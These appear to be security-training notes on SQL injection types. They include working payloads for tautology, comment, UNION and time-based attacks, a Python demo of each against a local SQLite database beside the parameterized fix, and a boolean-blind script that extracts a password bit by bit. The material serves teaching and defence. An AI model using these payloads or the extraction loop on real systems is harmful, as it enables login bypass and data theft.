13.2 Types of SQL Injection
- Error Based SQL Injection:
  - UNION SQL Injection
  - System Stored Procedure
  - Tautology
  - End of Line Comment
  - Illegal/Logically Incorrect Query
- Blind SQL Injection:
  - Time Delay
  - Boolean Exploitation
- There are two main types of SQL injection:
  - Error-Based SQL Injection:
    - Attackers intentionally insert malformed input into an application so that the database throws errors.
    - The attacker reads the database-level error messages that come back to confirm that the application has an SQL injection vulnerability and to learn about the query structure, the DBMS and the schema.
    - Based on this, the attacker then injects SQL queries that are specifically designed to compromise the data security of the application.
  - Blind SQL Injection:
    - The attacker gets no error messages from the system to work with.
    - Instead, the attacker sends a malicious SQL query and infers its result from the application's behaviour (the content of the response page, or how long the response takes).
Error Based SQL Injection
- Error based SQL Injection forces the database to perform an operation whose result is an error, and reads the error message that the application passes back to the client.
- The details of the exploitation differ from one DBMS to another, because each DBMS has its own error messages, comment syntax and built-in functions.
System Stored Procedure: Attackers exploit stored procedures that build dynamic SQL by concatenating their parameters and then execute the resulting string. The following procedure is deliberately vulnerable: it wraps the user-supplied values in quotes inside the string and runs it with EXEC.
CREATE PROCEDURE Login @user_name varchar(20), @password varchar(20)
AS
DECLARE @query varchar(250)
SET @query = 'SELECT 1 FROM usertable WHERE username = ''' + @user_name
           + ''' and password = ''' + @password + ''''
EXEC(@query)
GO
- If the attacker enters the following values in the application's user name and password fields while this procedure runs in the back end, the attacker will be able to log in with any password:
anyusername' or 1=1 --
anypassword
- The concatenated query becomes SELECT 1 FROM usertable WHERE username = 'anyusername' or 1=1 --' and password = 'anypassword', so the always-true OR condition returns a row and the password check is commented out. Using the procedure's parameters directly in a static query (or sp_executesql with bound parameters) instead of EXEC on a concatenated string removes the injection point.
End of Line Comment: After injecting code into a particular field, the legitimate code that follows is nullified through the use of an end of line comment:
SELECT * FROM user WHERE name = 'x' AND userid IS NULL; --';
- Comments are denoted by (--) in most DBMSs (in MySQL the -- must be followed by a space, and # also works), and everything from the marker to the end of the line is ignored by the query parser.
- The database executes the code up to the comment marker and ignores the rest of the query, here the password check:
SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
Illegal/Logically Incorrect Query: An attacker may gain knowledge about the back end by injecting illegal or logically incorrect requests, for example by appending a single quote character (') to a parameter to provoke a syntax error. The attacker sends the incorrect query to the database intentionally so that the resulting error message reveals injectable parameters, data types, names of tables and columns, and the DBMS in use, all of which help in carrying out further attacks.
Tautology: Injecting statements that are always true, so that the WHERE condition is satisfied for every row and the query always returns results:
SELECT * FROM users WHERE name = '' OR '1'='1';
- Uses a conditional OR clause; because AND binds tighter than OR, the injected OR '1'='1' overrides the other conditions in the WHERE clause.
- It can be used to bypass user authentication.
Union SQL Injection: A "UNION SELECT" statement returns the union of the intended dataset with an attacker-chosen dataset:
SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable
Union SQL Injection
- This technique involves joining a forged query to the original query.
- The result of the forged query is appended to the result of the original query, which allows the attacker to obtain the values of fields of other tables.
- Example:
SELECT Name, Phone, Address FROM Users WHERE Id=$id
- Now set the following Id value:
$id=1 UNION ALL SELECT creditCardNumber, 1, 1 FROM CreditCardTable
- The final query is as shown below:
SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber, 1, 1 FROM CreditCardTable
- The above query joins the result of the original query with every credit card number in CreditCardTable. The constant columns 1, 1 are padding: both SELECTs in a UNION must return the same number of columns with compatible types, otherwise the DBMS rejects the query.
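The three error-based payloads above (tautology, end-of-line comment and UNION), as an added example that is not from the original notes: each is run against an in-memory SQLite database through a query built by string concatenation, beside the parameterized query that defeats it. The users and CreditCardTable tables, their contents and the Python function names are constructed for this example; the payloads are the ones shown on the page. It also shows the column-count caveat, which is why the UNION payload pads with 1, 1.

```python
import sqlite3

# Constructed sample data (assumption, not from the original notes): a users
# table with the Name/Phone/Address columns the page's query selects, and the
# CreditCardTable that the page's UNION payload reads from.
SCHEMA = """
CREATE TABLE users (
    id INTEGER PRIMARY KEY, username TEXT, password TEXT,
    name TEXT, phone TEXT, address TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret',  'Alice Admin', '555-0100', '1 Main St');
INSERT INTO users VALUES (2, 'bob',   'hunter2', 'Bob Builder', '555-0101', '2 Side St');
CREATE TABLE CreditCardTable (userid INTEGER, creditCardNumber TEXT);
INSERT INTO CreditCardTable VALUES (1, '4111111111111111');
INSERT INTO CreditCardTable VALUES (2, '5500000000000004');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, username, password):
    # WHERE clause built by string concatenation: the input becomes SQL.
    sql = ("SELECT * FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    # Same query with bound parameters: quotes and comment markers in the
    # input are just characters of the compared value.
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def lookup_vulnerable(conn, user_id):
    # The page's "WHERE Id=$id" query, concatenated without quoting.
    sql = "SELECT Name, Phone, Address FROM users WHERE Id=" + str(user_id)
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    # Validate the type, then bind: "1 UNION ALL ..." is not an integer.
    sql = "SELECT Name, Phone, Address FROM users WHERE Id=?"
    return conn.execute(sql, (int(user_id),)).fetchall()


TAUTOLOGY = "' OR '1'='1"        # always-true WHERE condition
EOL_COMMENT = "admin'--"         # closes the string, comments out the password check
UNION = "1 UNION ALL SELECT creditCardNumber, 1, 1 FROM CreditCardTable"
UNION_BAD_COLUMNS = "1 UNION ALL SELECT creditCardNumber FROM CreditCardTable"


def demo():
    conn = connect()
    result = {}
    # Tautology: every row satisfies "... OR '1'='1'", so both users come back.
    result["tautology_rows"] = len(login_vulnerable(conn, TAUTOLOGY, TAUTOLOGY))
    # End-of-line comment: only the admin row matches, the password is never checked.
    rows = login_vulnerable(conn, EOL_COMMENT, "wrong-password")
    result["comment_user"] = rows[0][1] if len(rows) == 1 else None
    # UNION: first row is the legitimate record, the rest are card numbers.
    result["union_rows"] = lookup_vulnerable(conn, UNION)
    # Column counts must match or the DBMS rejects the UNION (hence the 1, 1 padding).
    try:
        lookup_vulnerable(conn, UNION_BAD_COLUMNS)
        result["union_bad_columns_error"] = False
    except sqlite3.OperationalError:
        result["union_bad_columns_error"] = True
    # Parameterized versions: the same payloads match nothing or are rejected.
    result["safe_tautology_rows"] = len(login_safe(conn, TAUTOLOGY, TAUTOLOGY))
    result["safe_comment_rows"] = len(login_safe(conn, EOL_COMMENT, "wrong-password"))
    try:
        lookup_safe(conn, UNION)
        result["safe_union_rejected"] = False
    except ValueError:
        result["safe_union_rejected"] = True
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

The comment payload works here because SQLite, like most DBMSs, treats -- as a comment to the end of the line; on MySQL the marker needs a trailing space. The safe variants do not sanitize the input at all: binding the values and validating the numeric type is enough, because the query text never changes.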
Blind SQL Injection
- No Error Message: Blind SQL Injection is used when a web application is vulnerable to SQL injection but the results of the injected query are not visible to the attacker.
- Generic Page: Blind SQL injection is identical to a normal SQL Injection except that when an attacker attempts to exploit the application, a generic custom page is displayed instead of a useful error message.
- Time-intensive: This type of attack can become time-intensive because a new statement must be crafted for each bit (or character) recovered, and each statement costs one request.
Note: An attacker can still steal data by asking a series of True and False questions through SQL statements and observing how the application responds to each.
No Error Messages Returned
- A detailed database error message helps the attacker to carry out SQL injection attacks on the application.
- However, if the developer turns off detailed error messages, the application returns a generic custom error page, which is not helpful to the attacker.
- In this case the attacker will attempt a blind SQL injection attack instead.
Blind SQL Injection: WAITFOR DELAY (YES or NO Response)
- a.k.a. Time-based SQL Injection
- The attacker injects a condition that makes the database pause only when the condition is true, for example WAITFOR DELAY '0:0:10' on Microsoft SQL Server, and measures the response time to obtain a YES or NO answer to each question even though the page content never changes.
Boolean Exploitation Technique
- a.k.a. inferential SQL Injection
- Multiple valid statements that evaluate to true and to false are supplied in the affected parameter of the HTTP request.
- By comparing the response page between the two conditions, the attacker can infer whether or not the injection was successful, and then ask one true/false question per bit or character of the data to be recovered.
- This technique is very useful when the tester finds a Blind SQL Injection situation, in which nothing is known about the outcome of an operation.
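The boolean-based inference loop described in the blind SQL injection sections above, as an added example that is not part of the original notes: a vulnerable lookup that reveals only whether a row exists (normal page versus generic page) is turned into a yes/no oracle, the injection point is confirmed with a true and a false condition, and a password is then recovered one bit per request, which is what makes the attack time-intensive. The users table, its contents and the function names (page_shows_content, BlindOracle, is_injectable, extract_password) are assumptions made for this example. SQLite is used so that it runs offline; the bit test relies on SQLite's unicode() and substr() functions, which have equivalents in other DBMSs.

```python
import sqlite3

# Constructed sample data (assumption, not from the original notes): one user
# whose password the attacker cannot see but wants to recover blind.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'Zx9!');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def page_shows_content(conn, user_id):
    # Models the vulnerable application: user_id is concatenated into the
    # query, but the only thing the caller learns is whether a row came back
    # (normal page) or not (generic page). Errors hide behind the same page.
    sql = "SELECT username FROM users WHERE id=" + str(user_id)
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


class BlindOracle:
    # Turns the page into a yes/no oracle and counts the requests spent.
    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        # "1 AND (...)" keeps the legitimate row only when condition is true.
        return page_shows_content(self.conn, "1 AND (" + condition + ")")


def is_injectable(oracle):
    # Boolean detection step: a true and a false condition must produce
    # different pages, otherwise the parameter is not boolean-injectable.
    return oracle.ask("1=1") and not oracle.ask("1=2")


def extract_password(oracle, max_len=32):
    # Recovers users.password for id=1 one bit at a time: every bit of every
    # character is one crafted statement and therefore one request.
    secret = "(SELECT password FROM users WHERE id=1)"
    recovered = ""
    for pos in range(1, max_len + 1):
        code = 0
        for bit in range(7):  # printable ASCII fits in 7 bits
            cond = "((unicode(substr(%s, %d, 1)) >> %d) & 1) = 1" % (secret, pos, bit)
            if oracle.ask(cond):
                code |= 1 << bit
        if code == 0:
            # substr() past the end yields '' and unicode('') is NULL, so every
            # bit test is false: the string has ended.
            break
        recovered += chr(code)
    return recovered


if __name__ == "__main__":
    oracle = BlindOracle(connect())
    print("injectable:", is_injectable(oracle))
    print("password:", extract_password(oracle), "in", oracle.requests, "requests")
```

A four-character password costs 35 requests here (7 bits per character plus 7 to detect the end of the string); a binary search over the character value instead of a bit test reduces that, but the cost is still one request per answer, which is the "time-intensive" point above. A time-based variant keeps exactly this loop and replaces the content check in page_shows_content with a timing check (for example IF(condition) WAITFOR DELAY '0:0:10' on SQL Server), so the response delay rather than the page content answers each question.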